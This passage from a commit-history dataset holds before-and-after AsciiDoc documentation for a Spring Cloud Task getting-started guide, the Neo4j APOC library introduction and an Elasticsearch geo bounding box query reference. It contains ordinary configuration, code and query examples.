{\n\t\t\tSystem.out.println(\"Hello World!\");\n\t\t}\n\t}\n}\n----\n\nWhile it may not look like much, quite a bit is going on. To read more about the Spring\nBoot specifics, take a look at their reference documentation here:\nhttp:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/[http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/]\n\nWe'll also need to create an `application.properties` in `src\/main\/resources`. We'll\nconfigure two properties in it: the application name (which is translated to the task name)\nand we'll set the logging for Spring Cloud Task to `DEBUG` so that we can see what's going\non:\n\n[source]\n----\nlogging.level.org.springframework.cloud.task=DEBUG\nspring.application.name=helloWorld\n----\n\n[[getting-started-at-task]]\n==== The @EnableTask annotation\n\nThe first non-Boot annotation in our example is the `@EnableTask` annotation. This class\nlevel annotation tells Spring Cloud Task to bootstrap its functionality. This occurs by\nimporting an additional configuration class, `SimpleTaskConfiguration` by default. This\nadditional configuration registers the `TaskRepository` and the infrastructure for its\nuse.\n\nOut of the box, the `TaskRepository` will use an in-memory `Map` to record the results\nof a task. Obviously this isn't a practical solution for a production environment since\nthe `Map` goes away once the task ends. However, for a quick getting started\nexperience we use this as a default as well as echoing to the logs what is being updated\nin that repository. 
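If you want the recorded executions to survive the JVM instead, it is usually enough to put a supported database driver on the classpath and point the standard Spring Boot datasource properties at it; Spring Cloud Task then stores its records in that database. A minimal sketch (the URL and credentials below are placeholders for your own environment, not values required by the framework):\n\n[source]\n----\nspring.datasource.url=jdbc:mysql:\/\/localhost:3306\/tasks\nspring.datasource.username=taskuser\nspring.datasource.password=secret\nspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n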
Later in this documentation we'll cover how to customize the\nconfiguration of the pieces provided by Spring Cloud Task.\n\nWhen our sample application is run, Spring Boot will launch our\n`HelloWorldCommandLineRunner` outputting our \"Hello World!\" message to standard out. The\n`TaskLifecycleListener` will record the start of the task and the end of the task in the\nrepository.\n\n[[getting-started-main-method]]\n==== The main method\n\nThe main method serves as the entry point to any Java application. Our main method\ndelegates to Spring Boot's `SpringApplication` class. You can read more about it in the\nSpring Boot documentation.\n\n[[getting-started-clr]]\n==== The CommandLineRunner\n\nIn Spring, there are many ways to bootstrap an application's logic. Spring Boot provides\na convenient method of doing so in an organized manner via their `*Runner` interfaces\n(`CommandLineRunner` or `ApplicationRunner`). A well-behaved task will bootstrap any\nlogic via one of these two runners.\n\nThe lifecycle of a task is considered from before the `*Runner#run` methods are executed\nto once they are all complete. Spring Boot allows an application to use multiple\n`*Runner` implementations and Spring Cloud Task doesn't attempt to interfere with this convention.\n\nNOTE: Any processing bootstrapped from mechanisms other than a `CommandLineRunner` or\n`ApplicationRunner` (using `InitializingBean#afterPropertiesSet` for example) will not be\nrecorded by Spring Cloud Task.\n\n[[getting-started-running-the-example]]\n=== Running the example\n\nAt this point, your application should work. Since this application is Spring Boot based,\nwe can run it from the command line via the command `$ mvn spring-boot:run` from the root\nof our application:\n\n[source]\n----\n$ mvn clean spring-boot:run\n....... . . .\n....... . . . (Maven log output here)\n....... . . .\n\n\n . 
____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: (v1.3.3.RELEASE)\n\n2016-01-25 11:08:10.183 INFO 12943 --- [ main] com.example.SampleTask : Starting SampleTask on Michaels-MacBook-Pro-2.local with PID 12943 (\/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example\/target\/classes started by mminella in \/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example)\n2016-01-25 11:08:10.185 INFO 12943 --- [ main] com.example.SampleTask : No active profile set, falling back to default profiles: default\n2016-01-25 11:08:10.226 INFO 12943 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.051 INFO 12943 --- [ main] o.s.j.e.a.AnnotationMBeanExporter : Registering beans for JMX exposure on startup\n2016-01-25 11:08:11.065 INFO 12943 --- [ main] o.s.c.t.r.support.SimpleTaskRepository : Creating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=null, statusCode='null', exitMessage='null', arguments=[]}\nHello World!\n2016-01-25 11:08:11.071 INFO 12943 --- [ main] com.example.SampleTask : Started SampleTask in 1.095 seconds (JVM running for 3.826)\n2016-01-25 11:08:11.220 INFO 12943 --- [ Thread-1] s.c.a.AnnotationConfigApplicationContext : Closing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.c.t.r.support.SimpleTaskRepository : Updating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=Mon Jan 25 11:08:11 CST 2016, statusCode='null', exitMessage='null', arguments=[]}\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.j.e.a.AnnotationMBeanExporter : Unregistering JMX-exposed beans on shutdown\n----\n\nNotice the three lines of interest in the above output:\n\n* `SimpleTaskRepository` logged out the creation of the entry in the `TaskRepository`.\n* The execution of our `CommandLineRunner`, demonstrated by the \"Hello World!\" output.\n* `SimpleTaskRepository` logging the completion of the task in the `TaskRepository`.\n\nNOTE: A simple task application can be found in the samples module\nof the Spring Cloud Task Project\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-task\/tree\/master\/spring-cloud-task-samples\/timestamp[here].\n\n\n=== Writing your test\n\nWhen writing your unit tests for a Spring Cloud Task application you have to keep\nin mind that Spring Cloud Task closes the context at the completion of the task,\nas discussed <<features.adoc#features-lifecycle, here>>. If you are using Spring\nFramework's testing functionality to manage the application context, you'll want to turn\noff Spring Cloud Task's auto-closing of the context. Adding the following\nline, `@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enabled=false\"})`,\nto your tests will keep the context open. 
For example:\n\n```\n@RunWith(SpringRunner.class)\n@SpringBootTest\n@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enabled=false\"})\npublic class DemoApplicationTests {\n\n\t@Test\n\tpublic void contextLoads() {\n\t\/\/your test here\n\t}\n\n}\n```","old_contents":"\n[[getting-started]]\n= Getting started\n\n[[partintro]]\n--\nIf you're just getting started with Spring Cloud Task, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Task. We'll then build our first Spring Cloud\nTask application, discussing some core principles as we go.\n--\n\n[[getting-started-introducing-spring-cloud-task]]\n== Introducing Spring Cloud Task\n\nSpring Cloud Task makes it easy to create short lived microservices. We provide\ncapabilities that allow short lived JVM processes to be executed on demand in a production\nenvironment.\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8) and to build you need to have Maven installed as well.\n\n=== Database Requirements\n\nSpring Cloud Task uses a relational database to store the results of an executed task.\nWhile you can begin developing a task without a database (the status of the task is logged\n as part of the task repository's updates), for production environments, you'll want to\nutilize a supported database. Below is a list of the ones currently supported:\n\n- DB2\n- H2\n- HSQLDB\n- MySql\n- Oracle\n- Postgres\n- SqlServer\n\n[[getting-started-developing-first-task]]\n== Developing your first Spring Cloud Task application\n\nA good place to start is with a simple \"Hello World!\" application so we'll create the\nSpring Cloud Task equivalent to highlight the features of the framework. We'll use Apache\nMaven as a build tool for this project since most IDEs have good support for it.\n\nNOTE: The spring.io web site contains many \u201cGetting Started\u201d guides that use Spring Boot.\nIf you\u2019re looking to solve a specific problem; check there first. You can shortcut the\nsteps below by going to start.spring.io and creating a new project. This will\nautomatically generate a new project structure so that you can start coding right the way.\nCheck the documentation for more details.\n\nBefore we begin, open a terminal to check that you have valid versions of Java and Maven\ninstalled.\n\n[source]\n$ java -version\njava version \"1.8.0_31\"\nJava(TM) SE Runtime Environment (build 1.8.0_31-b13)\nJava HotSpot(TM) 64-Bit Server VM (build 25.31-b07, mixed mode)\n\n[source]\n$ mvn -v\nApache Maven 3.2.3 (33f8c3e1027c3ddde99d3cdebad2656a31e8fdf4; 2014-08-11T15:58:10-05:00)\nMaven home: \/usr\/local\/Cellar\/maven\/3.2.3\/libexec\nJava version: 1.8.0_31, vendor: Oracle Corporation\n\nNOTE: This sample needs to be created in its own folder. Subsequent instructions assume\nyou have created a suitable folder and that it is your \"current directory\".\n\n[[getting-started-creating-the-pom]]\n=== Creating the POM\n\nWe need to start by creating a Maven `pom.xml` file. The `pom.xml` is the recipe that\nwill be used to build your project. 
Open your favorite text editor and add the following:\n\n[code,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n\t\t xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\t xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n\n\t<modelVersion>4.0.0<\/modelVersion>\n\n\t<groupId>com.example<\/groupId>\n\t<artifactId>myproject<\/artifactId>\n\t<packaging>jar<\/packaging>\n\t<version>0.0.1-SNAPSHOT<\/version>\n\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>1.5.2.RELEASE<\/version>\n\t<\/parent>\n\n\t<properties>\n\t\t<start-class>com.example.SampleTask<\/start-class>\n\t<\/properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n<\/project>\n----\n\nThis should give you a working build. You can test it out by running `mvn package` (you\ncan ignore the \"jar will be empty - no content was marked for inclusion!\" warning for\nnow).\n\nNOTE: At this point you could import the project into an IDE (most modern Java IDE's\ninclude built-in support for Maven). For simplicity we will continue to use a plain text\neditor for this example.\n\n[[getting-started-adding-classpath-dependencies]]\n=== Adding classpath dependencies\n\nA Spring Cloud Task is made up of a Spring Boot application that is expected to end. In\nour POM above, we created the shell of a Spring Boot application from a dependency\nperspective by setting our parent to use the `spring-boot-starter-parent`.\n\nSpring Boot provides a number of additional \"Starter POMs\". Some of which are appropriate\nfor use within tasks (`spring-boot-starter-batch`, `spring-boot-starter-jdbc`, etc) and\nsome may not be ('spring-boot-starter-web` is probably not going to be used in a task).\nThe indicator of if a starter makes sense or not comes down to if the resulting\napplication will end (batch based applications typically end, the\n`spring-boot-starter-web` dependency bootstraps a servlet container which probably wont').\n\nFor this example, we'll only need to add a single additional dependency, the one for\nSpring Cloud Task itself:\n\n[source,xml]\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.cloud<\/groupId>\n\t\t\t<artifactId>spring-cloud-task-core<\/artifactId>\n\t\t\t<version>1.2.1.RELEASE<\/version>\n\t\t<\/dependency>\n\n[[getting-started-writing-the-code]]\n=== Writing the code\n\nTo finish our application, we need to create a single Java file. Maven will compile the\nsources from `src\/main\/java` by default so you need to create that folder structure. 
Then\nadd a file named `src\/main\/java\/com\/example\/SampleTask.java`:\n\n[source,java]\n----\npackage com.example;\n\nimport org.springframework.boot.*;\nimport org.springframework.boot.autoconfigure.SpringBootApplication;\nimport org.springframework.cloud.task.configuration.EnableTask;\nimport org.springframework.context.annotation.Bean;\n\n@SpringBootApplication\n@EnableTask\npublic class SampleTask {\n\n\t@Bean\n\tpublic CommandLineRunner commandLineRunner() {\n\t\treturn new HelloWorldCommandLineRunner();\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SampleTask.class, args);\n\t}\n\n\tpublic static class HelloWorldCommandLineRunner implements CommandLineRunner {\n\n\t\t@Override\n\t\tpublic void run(String... strings) throws Exception {\n\t\t\tSystem.out.println(\"Hello World!\");\n\t\t}\n\t}\n}\n----\n\nWhile it may not look like much, quite a bit is going on. To read more about the Spring\nBoot specifics, take a look at their reference documentation here:\nhttp:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/[http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/]\n\nWe'll also need to create an `application.properties` in `src\/main\/resources`. We'll\nconfigure two properties in it: the application name (which is translated to the task name)\nand we'll set the logging for spring cloud task to `DEBUG` so that we can see what's going\non:\n\n[source]\n----\nlogging.level.org.springframework.cloud.task=DEBUG\nspring.application.name=helloWorld\n----\n\n[[getting-started-at-task]]\n==== The @EnableTask annotation\n\nThe first non boot annotation in our example is the `@EnableTask` annotation. This class\nlevel annotation tells Spring Cloud Task to bootstrap it's functionality. This occurs by\nimporting an additional configuration class, `SimpleTaskConfiguration` by default. This\nadditional configuration registers the `TaskRepository` and the infrastructure for its\nuse.\n\nOut of the box, the `TaskRepository` will use an in memory `Map` to record the results\nof a task. Obviously this isn't a practical solution for a production environment since\nthe `Map` goes away once the task ends. However, for a quick getting started\nexperience we use this as a default as well as echoing to the logs what is being updated\nin that repository. Later in this documentation we'll cover how to customize the\nconfiguration of the pieces provided by Spring Cloud Task.\n\nWhen our sample application is run, Spring Boot will launch our\n`HelloWorldCommandLineRunner` outputting our \"Hello World!\" message to standard out. The\n`TaskLifecyceListener` will record the start of the task and the end of the task in the\nrepository.\n\n[[getting-started-main-method]]\n==== The main method\n\nThe main method serves as the entry point to any java application. Our main method\ndelegates to Spring Boot's `SpringApplication` class. You can read more about it in the\nSpring Boot documentation.\n\n[[getting-started-clr]]\n==== The CommandLineRunner\n\nIn Spring, there are many ways to bootstrap an application's logic. Spring Boot provides\na convenient method of doing so in an organized manner via their `*Runner` interfaces\n(`CommandLineRunner` or `ApplicationRunner`). A well behaved task will bootstrap any\nlogic via one of these two runners.\n\nThe lifecycle of a task is considered from before the `*Runner#run` methods are executed\nto once they are all complete. 
Spring Boot allows an application to use multiple\n`*Runner` implementation and Spring Cloud Task doesn't attempt to impede on this convention.\n\nNOTE: Any processing bootstrapped from mechanisms other than a `CommandLineRunner` or\n`ApplicationRunner` (using `InitializingBean#afterPropertiesSet` for example) will not be\n recorded by Spring Cloud Task.\n\n[[getting-started-running-the-example]]\n=== Running the example\n\nAt this point, your application should work. Since this application is Spring Boot based,\n we can run it from the command line via the command `$ mvn spring-boot:run` from the root\n of our applicaiton:\n\n[source]\n----\n$ mvn clean spring-boot:run\n....... . . .\n....... . . . (Maven log output here)\n....... . . .\n\n\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: (v1.3.3.RELEASE)\n\n2016-01-25 11:08:10.183 INFO 12943 --- [ main] com.example.SampleTask : Starting SampleTask on Michaels-MacBook-Pro-2.local with PID 12943 (\/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example\/target\/classes started by mminella in \/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example)\n2016-01-25 11:08:10.185 INFO 12943 --- [ main] com.example.SampleTask : No active profile set, falling back to default profiles: default\n2016-01-25 11:08:10.226 INFO 12943 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.051 INFO 12943 --- [ main] o.s.j.e.a.AnnotationMBeanExporter : Registering beans for JMX exposure on startup\n2016-01-25 11:08:11.065 INFO 12943 --- [ main] o.s.c.t.r.support.SimpleTaskRepository : Creating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=null, statusCode='null', exitMessage='null', arguments=[]}\nHello World!\n2016-01-25 11:08:11.071 INFO 12943 --- [ main] com.example.SampleTask : Started SampleTask in 1.095 seconds (JVM running for 3.826)\n2016-01-25 11:08:11.220 INFO 12943 --- [ Thread-1] s.c.a.AnnotationConfigApplicationContext : Closing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a2c3676: startup date [Mon Jan 25 11:08:10 CST 2016]; root of context hierarchy\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.c.t.r.support.SimpleTaskRepository : Updating: TaskExecution{executionId=0, externalExecutionID='null', exitCode=0, taskName='application', startTime=Mon Jan 25 11:08:11 CST 2016, endTime=Mon Jan 25 11:08:11 CST 2016, statusCode='null', exitMessage='null', arguments=[]}\n2016-01-25 11:08:11.222 INFO 12943 --- [ Thread-1] o.s.j.e.a.AnnotationMBeanExporter : Unregistering JMX-exposed beans on shutdown\n----\n\nIf you notice, there are three lines of interest in the above output:\n\n* `SimpleTaskRepository` logged out the creation of the entry in the `TaskRepository`.\n* The execution of our `CommandLineRunner`, demonstrated by the \"Hello World!\" output.\n* `SimpleTaskRepository` logging the completion of the task in the `TaskRepository`.\n\nNOTE: A simple task application can be found in the samples module\nof the Spring Cloud Task 
Project\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-task\/tree\/master\/spring-cloud-task-samples\/timestamp[here].\n\n\n=== Writing your test\n\nWhen writing your unit tests for a Spring Cloud Task application we have to keep\nin mind that Spring Cloud Task closes the context at the completion of the task\nas discussed <<features.adoc#features-lifecycle, here>>. If you are using Spring\nFramework's testing functionality to manage the application context, you'll want to turn\noff Spring Cloud Task's auto-closing of the context. Add the following\nline: `@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enable=false\"})`\nto your tests will keep the context open. For example:\n\n```\n@RunWith(SpringRunner.class)\n@SpringBootTest\n@TestPropertySource(properties = {\"spring.cloud.task.closecontext_enabled=false\"})\npublic class DemoApplicationTests {\n\n\t@Test\n\tpublic void contextLoads() {\n\t\/\/your test here\n\t}\n\n}\n```","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00b1f93732d6b2597f8ee048886b465a79ab760a","subject":"Improve clarity on editions and add some links (#2244) (#2305)","message":"Improve clarity on editions and add some links (#2244) (#2305)\n\nCo-authored-by: Michael Hunger <64b2b6d12bfe4baae7dad3d018f8cbf6b0e7a044@jexp.de>","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/pages\/introduction\/index.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/pages\/introduction\/index.adoc","new_contents":"[[introduction]]\n= Introduction\n:description: This chapter provides an introduction to the APOC library, and instructions for installation and use.\n\n\n\n\nifdef::backend-html5[]\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\nendif::[]\n\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\n\n[NOTE]\n====\n.APOC Name History\n\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n====\n\n== APOC Editions - Core and Full\n\nStarting from Neo4j 4.1.1, there are two available versions of the APOC Library:\n\n_APOC Core_ :: battle hardened procedures and functions that don't have external dependencies or require configuration. 
This is also the based of the functionality available in https:\/\/neo4j.com\/aura[Neo4j AuraDB^] which lists the https:\/\/neo4j.com\/docs\/aura\/current\/getting-started\/apoc\/[available APOC surface in their docs^].\n_APOC Full_ :: contains everything in APOC core, as well as additional procedures and functions, which is available both in https:\/\/neo4j.com\/sandbox[Neo4j Sandbox^], the https:\/\/neo4j.com\/docs\/operations-manual\/current\/docker\/operations\/#docker-neo4jlabs-pluginsneo4j.com[Docker image^] and https:\/\/neo4j.com\/docs\/desktop-manual\/current\/operations\/#install-plugin[Neo4j Desktop^], as well as when you self-host the database and add the apoc-full jar.\n\n\nA list of functions and procedures in _APOC Core_ and _APOC Full_ can be found in xref::overview\/index.adoc[].\n","old_contents":"[[introduction]]\n= Introduction\n:description: This chapter provides an introduction to the APOC library, and instructions for installation and use.\n\n\n\n\nifdef::backend-html5[]\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/V1DTBjetIfk\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen><\/iframe>\n++++\nendif::[]\n\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\n\n[NOTE]\n====\n.APOC Name History\n\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n====\n\nStarting from Neo4j 4.1.1, there are two available versions of the APOC Library:\n\n_APOC Core_ :: battle hardened procedures and functions that don't have external dependencies or require configuration.\n_APOC Full_ :: contains everything in APOC core, as well as additional procedures and functions.\n\n\nA list of functions and procedures in _APOC Core_ and _APOC Full_ can be found in xref::overview\/index.adoc[].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3121f8466dcd84ab55966f4d96c176ae957b2ea0","subject":"Changed boost keyword with bool in bounding box query","message":"Changed boost keyword with bool in bounding box query\n","repos":"baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo","old_file":"docs\/reference\/query-dsl\/geo-bounding-box-query.asciidoc","new_file":"docs\/reference\/query-dsl\/geo-bounding-box-query.asciidoc","new_contents":"[[query-dsl-geo-bounding-box-query]]\n=== Geo Bounding Box Query\n\nA query allowing to filter hits based on a point location using a\nbounding box. 
Assuming the following indexed document:\n\n[source,js]\n--------------------------------------------------\n{\n \"pin\" : {\n \"location\" : {\n \"lat\" : 40.12,\n \"lon\" : -71.34\n }\n }\n}\n--------------------------------------------------\n\nThen the following simple query can be executed with a\n`geo_bounding_box` filter:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Query Options\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Option |Description\n|`_name` |Optional name field to identify the filter\n\n|`coerce` |Set to `true` to normalize longitude and latitude values to a\nstandard -180:180 \/ -90:90 coordinate system. (default is `false`).\n\n|`ignore_malformed` |Set to `true` to\naccept geo points with invalid latitude or longitude (default is `false`).\n\n|`type` |Set to one of `indexed` or `memory` to defines whether this filter will\nbe executed in memory or indexed. See <<geo-bbox-type,Type>> below for further details\nDefault is `memory`.\n|=======================================================================\n\n[float]\n==== Accepted Formats\n\nIn much the same way the geo_point type can accept different\nrepresentation of the geo point, the filter can accept it as well:\n\n[float]\n===== Lat Lon As Properties\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As Array\n\nFormat in `[lon, lat]`, note, the order of lon\/lat here in order to\nconform with http:\/\/geojson.org\/[GeoJSON].\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : [-74.1, 40.73],\n \"bottom_right\" : [-71.12, 40.01]\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As String\n\nFormat in `lat,lon`.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"40.73, -74.1\",\n \"bottom_right\" : \"40.01, -71.12\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Geohash\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"dr5r9ydj2y73\",\n \"bottom_right\" : \"drj7teegpus6\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Vertices\n\nThe vertices of the bounding box can either be set by `top_left` and\n`bottom_right` or by `top_right` and `bottom_left` parameters. 
More\nover the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft`\nare supported. Instead of setting the values pairwise, one can use\nthe simple names `top`, `left`, `bottom` and `right` to set the\nvalues separately.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top\" : -74.1,\n \"left\" : 40.73,\n \"bottom\" : -71.12,\n \"right\" : 40.01\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\n[float]\n==== geo_point Type\n\nThe filter *requires* the `geo_point` type to be set on the relevant\nfield.\n\n[float]\n==== Multi Location Per Document\n\nThe filter can work with multiple locations \/ points per document. Once\na single location \/ point matches the filter, the document will be\nincluded in the filter\n\n[float]\n[[geo-bbox-type]]\n==== Type\n\nThe type of the bounding box execution by default is set to `memory`,\nwhich means in memory checks if the doc falls within the bounding box\nrange. In some cases, an `indexed` option will perform faster (but note\nthat the `geo_point` type must have lat and lon indexed in this case).\nNote, when using the indexed option, multi locations per document field\nare not supported. Here is an example:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.10,\n \"lon\" : -71.12\n }\n },\n \"type\" : \"indexed\"\n }\n }\n }\n}\n--------------------------------------------------\n\n","old_contents":"[[query-dsl-geo-bounding-box-query]]\n=== Geo Bounding Box Query\n\nA query allowing to filter hits based on a point location using a\nbounding box. Assuming the following indexed document:\n\n[source,js]\n--------------------------------------------------\n{\n \"pin\" : {\n \"location\" : {\n \"lat\" : 40.12,\n \"lon\" : -71.34\n }\n }\n}\n--------------------------------------------------\n\nThen the following simple query can be executed with a\n`geo_bounding_box` filter:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Query Options\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Option |Description\n|`_name` |Optional name field to identify the filter\n\n|`coerce` |Set to `true` to normalize longitude and latitude values to a\nstandard -180:180 \/ -90:90 coordinate system. (default is `false`).\n\n|`ignore_malformed` |Set to `true` to\naccept geo points with invalid latitude or longitude (default is `false`).\n\n|`type` |Set to one of `indexed` or `memory` to defines whether this filter will\nbe executed in memory or indexed. 
